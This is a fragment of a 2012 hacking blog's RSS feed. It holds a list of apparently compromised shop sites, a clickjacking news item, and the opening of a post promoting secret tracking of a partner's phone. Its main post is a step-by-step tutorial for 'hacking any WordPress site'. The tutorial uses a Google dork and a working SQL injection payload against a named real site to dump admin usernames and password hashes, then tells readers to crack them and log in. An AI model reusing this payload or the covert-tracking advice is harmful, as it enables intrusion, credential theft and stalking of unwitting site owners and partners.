&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif; font-size: xx-small;&quot;&gt;
&lt;li&gt;http://www.utahflowers.net/jaihind.html&lt;/li&gt;
&lt;li&gt;http://www.eesnet.org/jaihind.html&lt;/li&gt;
&lt;li&gt;http://bestonlinediscounts.net/&lt;/li&gt;
&lt;li&gt;http://wenrestaurant.com/&lt;/li&gt;
&lt;li&gt;http://ruthsgarden.com/&lt;/li&gt;
&lt;li&gt;http://www.utahflowers.net/&lt;/li&gt;
&lt;li&gt;http://www.inlove.my/&lt;/li&gt;
&lt;li&gt;http://megamall.com.pk/&lt;/li&gt;
&lt;li&gt;http://stefanyboutique.com/&lt;/li&gt;
&lt;li&gt;http://www.virtualgeorge.info/&lt;/li&gt;
&lt;li&gt;http://iphoneclone.biz/&lt;/li&gt;
&lt;li&gt;http://amourcristallis.com/&lt;/li&gt;
&lt;li&gt;http://www.eesnet.org/&lt;/li&gt;
&lt;li&gt;http://www.schoolshopper.com.au/&lt;/li&gt;
&lt;li&gt;http://www.mymaxi.nl/&lt;/li&gt;
&lt;li&gt;http://wiretek.net/&lt;/li&gt;
&lt;li&gt;http://shop.tjokgus.com/&lt;/li&gt;
&lt;li&gt;http://www.aquariumsystem.it/&lt;/li&gt;
&lt;li&gt;http://uae-shopper.com/&lt;/li&gt;
&lt;li&gt;http://organicjewelries.com/&lt;/li&gt;
&lt;li&gt;http://www.granmasantiques.com/&lt;/li&gt;
&lt;li&gt;http://avocadogenie.com/&lt;/li&gt;
&lt;li&gt;http://www.inputandanalysis.com&lt;/li&gt;
&lt;li&gt;http://eddiegifts.com/&lt;/li&gt;
&lt;li&gt;http://bestonlinediscounts.net/&lt;/li&gt;
&lt;li&gt;http://wenrestaurant.com/&lt;/li&gt;
&lt;li&gt;http://ruthsgarden.com/&lt;/li&gt;
&lt;li&gt;http://www.utahflowers.net?/&lt;/li&gt;
&lt;li&gt;http://www.inlove.my/&lt;/li&gt;
&lt;li&gt;http://megamall.com.pk/&lt;/li&gt;
&lt;li&gt;http://stefanyboutique.com?/&lt;/li&gt;
&lt;li&gt;http://www.inputandanalysis.com/&lt;/li&gt;
&lt;li&gt;http://www.virtualgeorge.info/&lt;/li&gt;
&lt;li&gt;http://iphoneclone.biz/&lt;/li&gt;
&lt;li&gt;http://amourcristallis.com?/&lt;/li&gt;
&lt;li&gt;http://www.eesnet.org/&lt;/li&gt;
&lt;li&gt;http://www.schoolshopper.com.au/&lt;/li&gt;
&lt;li&gt;http://www.mymaxi.nl/&lt;/li&gt;
&lt;li&gt;http://wiretek.net/&lt;/li&gt;
&lt;li&gt;http://shop.tjokgus.com/&lt;/li&gt;
&lt;li&gt;http://www.aquariumsystem.it/&lt;/li&gt;
&lt;li&gt;http://uae-shopper.com/&lt;/li&gt;
&lt;li&gt;http://organicjewelries.com/&lt;/li&gt;
&lt;li&gt;http://www.granmasantiques.com/&lt;/li&gt;
&lt;li&gt;http://avocadogenie.com/&lt;/li&gt;
&lt;li&gt;http://www.inputandanalysis.com/&lt;/li&gt;
&lt;li&gt;http://www.utahflowers.net/&lt;/li&gt;
&lt;li&gt;http://stefanyboutique.com/&lt;/li&gt;
&lt;li&gt;http://amourcristallis.com/&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;&lt;u&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyveo74w5a-rCCKJjsY0lmypgXODst2zffRmyX8PK7wbUT1TfVKMN3uOxFF8z4UNrvnEAgNfXuFCXUc1cvOLaZ-HNA2EClPJGTiSgS8M2kfWppAlQypH3NzFnKe0EJ2S56CWuUyPFSOuE/s1600/FCK2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyveo74w5a-rCCKJjsY0lmypgXODst2zffRmyX8PK7wbUT1TfVKMN3uOxFF8z4UNrvnEAgNfXuFCXUc1cvOLaZ-HNA2EClPJGTiSgS8M2kfWppAlQypH3NzFnKe0EJ2S56CWuUyPFSOuE/s1600/FCK2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyveo74w5a-rCCKJjsY0lmypgXODst2zffRmyX8PK7wbUT1TfVKMN3uOxFF8z4UNrvnEAgNfXuFCXUc1cvOLaZ-HNA2EClPJGTiSgS8M2kfWppAlQypH3NzFnKe0EJ2S56CWuUyPFSOuE/s1600/FCK2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyveo74w5a-rCCKJjsY0lmypgXODst2zffRmyX8PK7wbUT1TfVKMN3uOxFF8z4UNrvnEAgNfXuFCXUc1cvOLaZ-HNA2EClPJGTiSgS8M2kfWppAlQypH3NzFnKe0EJ2S56CWuUyPFSOuE/s1600/FCK2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9yE1QaYVMvDK-2ZznfcU8YnaDBdYNUClJiAQH9aaTWEzgAo8fa7TTvemqSETZZd_y5kLtWN1Flb3qgzZsHpOUaRsraZumR-h0zHUng1KtiYfduL7NXTD1Mwq43dl2ibUapOgzxPcXNw/s1600/FCK1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH9yE1QaYVMvDK-2ZznfcU8YnaDBdYNUClJiAQH9aaTWEzgAo8fa7TTvemqSETZZd_y5kLtWN1Flb3qgzZsHpOUaRsraZumR-h0zHUng1KtiYfduL7NXTD1Mwq43dl2ibUapOgzxPcXNw/s1600/FCK1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/wordpress-fckeditor-upload-vunerablity.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bCdgxI-de41uJ1DiM-CWBg8QMJAyKas4UqDcpnNasWEmp8Y_2VTK1AaUBaKaGvb2JIgBrUpinlryL07OZV0s2cV-p2dgYfIfcxdRziXKDgpFhk_Z7CnI1gHJdvG50Q1RFWn8ZQnBuy8/s72-c/wordpress-logo.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-5444881380546796629</guid><pubDate>Thu, 12 Jan 2012 10:10:00 +0000</pubDate><atom:updated>2012-01-12T15:40:54.005+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><category domain="http://www.blogger.com/atom/ns#">Wordpress Hacking</category><title>Simplest way to hack any Wordpress based site</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bCdgxI-de41uJ1DiM-CWBg8QMJAyKas4UqDcpnNasWEmp8Y_2VTK1AaUBaKaGvb2JIgBrUpinlryL07OZV0s2cV-p2dgYfIfcxdRziXKDgpFhk_Z7CnI1gHJdvG50Q1RFWn8ZQnBuy8/s1600/wordpress-logo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;186&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bCdgxI-de41uJ1DiM-CWBg8QMJAyKas4UqDcpnNasWEmp8Y_2VTK1AaUBaKaGvb2JIgBrUpinlryL07OZV0s2cV-p2dgYfIfcxdRziXKDgpFhk_Z7CnI1gHJdvG50Q1RFWn8ZQnBuy8/s200/wordpress-logo.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;In this post I&#39;ll tell you the &lt;i&gt;&lt;b&gt;SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;b&gt;First&lt;/b&gt; we&#39;ll use this dork to search website with the help of Google&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span style=&quot;color: red; font-weight: bold;&quot;&gt;inurl:&quot;wp-content/plugins/photoracer/viewimg.php?id=&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;Results:&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9Cor3kJLrWMlUcJNgtc5cWqqCFGaT18WilE_iAT1awTpG_VUePjnmf189Xp1SNX6PMLYBM_3DTVq7hw50tYJEoynYqDr2MDRPoAcLK5sMBBoVCedpiAU0ZZ9ivNJlQAIIw1cJImgE6g/s1600/search_results.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;500&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9Cor3kJLrWMlUcJNgtc5cWqqCFGaT18WilE_iAT1awTpG_VUePjnmf189Xp1SNX6PMLYBM_3DTVq7hw50tYJEoynYqDr2MDRPoAcLK5sMBBoVCedpiAU0ZZ9ivNJlQAIIw1cJImgE6g/s640/search_results.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;I&#39;m now gonna test one of them..&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;For eg..&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span style=&quot;color: red; font-weight: bold;&quot;&gt;http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;br /&gt;
Now add the Exploit..&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span style=&quot;font-size: 10px; font-weight: bold;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/blockquote&gt;&lt;b&gt;This is the exploit..&lt;/b&gt; &lt;i&gt;&lt;b&gt;(&lt;/b&gt;GIVEN ABOVE&lt;b&gt;)&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
And now the site address will become..&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-family: Verdana,sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span style=&quot;color: red; font-size: 10px; font-weight: bold;&quot;&gt;http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUo4UfNI_G_FVQk6aK-CKskzxM3tHmgM6ZWE882qu5ICcL9HkThM35pxN6p5nQkGugaR8xgav8Kr7G7IUhmJvkOHv5BAkErQ2pxdRIswrbAp5LAtvmzI8QKKzq1a33cN5H7UGFzdxrrB0/s1600/Search_result2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;299&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUo4UfNI_G_FVQk6aK-CKskzxM3tHmgM6ZWE882qu5ICcL9HkThM35pxN6p5nQkGugaR8xgav8Kr7G7IUhmJvkOHv5BAkErQ2pxdRIswrbAp5LAtvmzI8QKKzq1a33cN5H7UGFzdxrrB0/s640/Search_result2.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Now you can see the ADMIN and PASS....just crack the HASHES and you&#39;re done..&lt;br /&gt;
&lt;br /&gt;
Site Admin Login page for WP&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;background-color: red; font-size: small;&quot;&gt;&lt;b&gt;http://www.SITE-ADDRESS/wp-login.php&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/simplest-way-to-hack-any-wordpress.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bCdgxI-de41uJ1DiM-CWBg8QMJAyKas4UqDcpnNasWEmp8Y_2VTK1AaUBaKaGvb2JIgBrUpinlryL07OZV0s2cV-p2dgYfIfcxdRziXKDgpFhk_Z7CnI1gHJdvG50Q1RFWn8ZQnBuy8/s72-c/wordpress-logo.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-60317483165627894</guid><pubDate>Sun, 08 Jan 2012 09:22:00 +0000</pubDate><atom:updated>2012-01-08T14:52:42.539+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">The Cyber News</category><category domain="http://www.blogger.com/atom/ns#">Tips &#39;n&#39; Tricks</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><title>Ping.fm vulnerable to Clickjacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioD2XdSqg-Q3AuSciEGPgU6J8W77wA0n8YJW6rTREU9p_kH62Ut9K6qluk0Y7ExeD8wIA9g6NljllOz5jSy8dydvYAchD4EesRPj7NEpUaexgkt0L2qXCQhz3klxO7lonGj7VGRzSE4PA/s1600/ping_fm.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioD2XdSqg-Q3AuSciEGPgU6J8W77wA0n8YJW6rTREU9p_kH62Ut9K6qluk0Y7ExeD8wIA9g6NljllOz5jSy8dydvYAchD4EesRPj7NEpUaexgkt0L2qXCQhz3klxO7lonGj7VGRzSE4PA/s1600/ping_fm.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Two Indian Hackers&amp;nbsp;Aditya  Gupta(@adi1391) and Subho Halder (@sunnyrockzzs)  have&amp;nbsp;discovered&amp;nbsp;Clickjacking&amp;nbsp;vulnerability in one of the famous website &quot;&lt;b&gt;Ping.FM&lt;/b&gt;&quot;.&amp;nbsp;Clickjacking  is a malicious technique of tricking Web users into revealing  confidential information or taking control of their computer while  clicking on seemingly innocuous web pages.&lt;/div&gt;&lt;br /&gt;
This is based on a technique known as clickjacking ( or UI Redressing )  where an attacker could perform actions on the behalf of user by  tricking the user to click on a button or perform some other action. &lt;br /&gt;
&lt;br /&gt;
This vulnerability was earlier seen in Twitter where it allows the  status to be loaded through the GET method, and an attacker could frame  the twitter webpage and trick the user to&amp;nbsp;click on the tweet button,  with the user thinking that its a part of the attacker&#39;s webpage.&lt;br /&gt;
&lt;br /&gt;
This can be disabled by setting the X-FRAME-ORIGIN method to SAME ORIGIN  or DENYING the use of webpage inside a frame which have been adopted by  google, facebook and many other famous websites. &lt;br /&gt;
&lt;br /&gt;
Ping.fm is a online service which  allows the user to connect to many social networks at once. However an  attacker could use a technique known as Clickjacking to silently update  the user&#39;s social networking status at Twitter, Facebook and all other  connected accounts.In this technique, the user is tricked into clicking  on a button on a webpage designed by the attacker,which silently updates  the status of the user on the social netowrks status taking advantage  of thePing.fm API and clickjacking technique.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Video DEMO POC:&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/7ERDIJBtLwg?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt; &lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioD2XdSqg-Q3AuSciEGPgU6J8W77wA0n8YJW6rTREU9p_kH62Ut9K6qluk0Y7ExeD8wIA9g6NljllOz5jSy8dydvYAchD4EesRPj7NEpUaexgkt0L2qXCQhz3klxO7lonGj7VGRzSE4PA/s1600/ping_fm.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioD2XdSqg-Q3AuSciEGPgU6J8W77wA0n8YJW6rTREU9p_kH62Ut9K6qluk0Y7ExeD8wIA9g6NljllOz5jSy8dydvYAchD4EesRPj7NEpUaexgkt0L2qXCQhz3klxO7lonGj7VGRzSE4PA/s1600/ping_fm.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/pingfm-vulnerable-to-clickjacking.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioD2XdSqg-Q3AuSciEGPgU6J8W77wA0n8YJW6rTREU9p_kH62Ut9K6qluk0Y7ExeD8wIA9g6NljllOz5jSy8dydvYAchD4EesRPj7NEpUaexgkt0L2qXCQhz3klxO7lonGj7VGRzSE4PA/s72-c/ping_fm.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-8657813211133107073</guid><pubDate>Sun, 08 Jan 2012 07:23:00 +0000</pubDate><atom:updated>2012-01-08T12:53:42.253+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Cellphone Hacking</category><category domain="http://www.blogger.com/atom/ns#">G.P.S.</category><category domain="http://www.blogger.com/atom/ns#">Tips &#39;n&#39; Tricks</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><title>Trace Anyones Mobile with G.P.S. and without G.P.S.</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuvPioojGqYDdYgrNXb3Xch8hRtHPmQgQTSPatzZXilkoxcsu4ab6oJ04SSfS66w6CZlC5o581dNRBRhWM8Yp9srhLk_TNFozhEjbc_0mCHyoV7iZN4JZMRiaNqtf1DCV4yRpVSBUzT4/s1600/laptop8_gps_lr.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieuvPioojGqYDdYgrNXb3Xch8hRtHPmQgQTSPatzZXilkoxcsu4ab6oJ04SSfS66w6CZlC5o581dNRBRhWM8Yp9srhLk_TNFozhEjbc_0mCHyoV7iZN4JZMRiaNqtf1DCV4yRpVSBUzT4/s320/laptop8_gps_lr.jpg&quot; width=&quot;312&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Do you doubt on your Boyfriend/Girlfriend ? Do you wanna track them via  mobile location? This is now possible...I&#39;m  not joking. Many of us  think that this is not possible or we have to spend  some money for such  services but believe me that we don’t have to spend  any money for  getting this done. &amp;nbsp;Yes, &lt;b&gt;&lt;a href=&quot;http://phoneonmap.com/&quot; target=&quot;_blank&quot; title=&quot;Track a cell phone&quot;&gt;PhoneOnMap&lt;/a&gt;&lt;/b&gt; makes it possible, which provides&amp;nbsp;a free &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;application&lt;/span&gt; that has to be&amp;nbsp;installed in G.P.S. cell phone and you are ready to track the phone from anywhere on the Internet.&lt;br /&gt;
&lt;br /&gt;
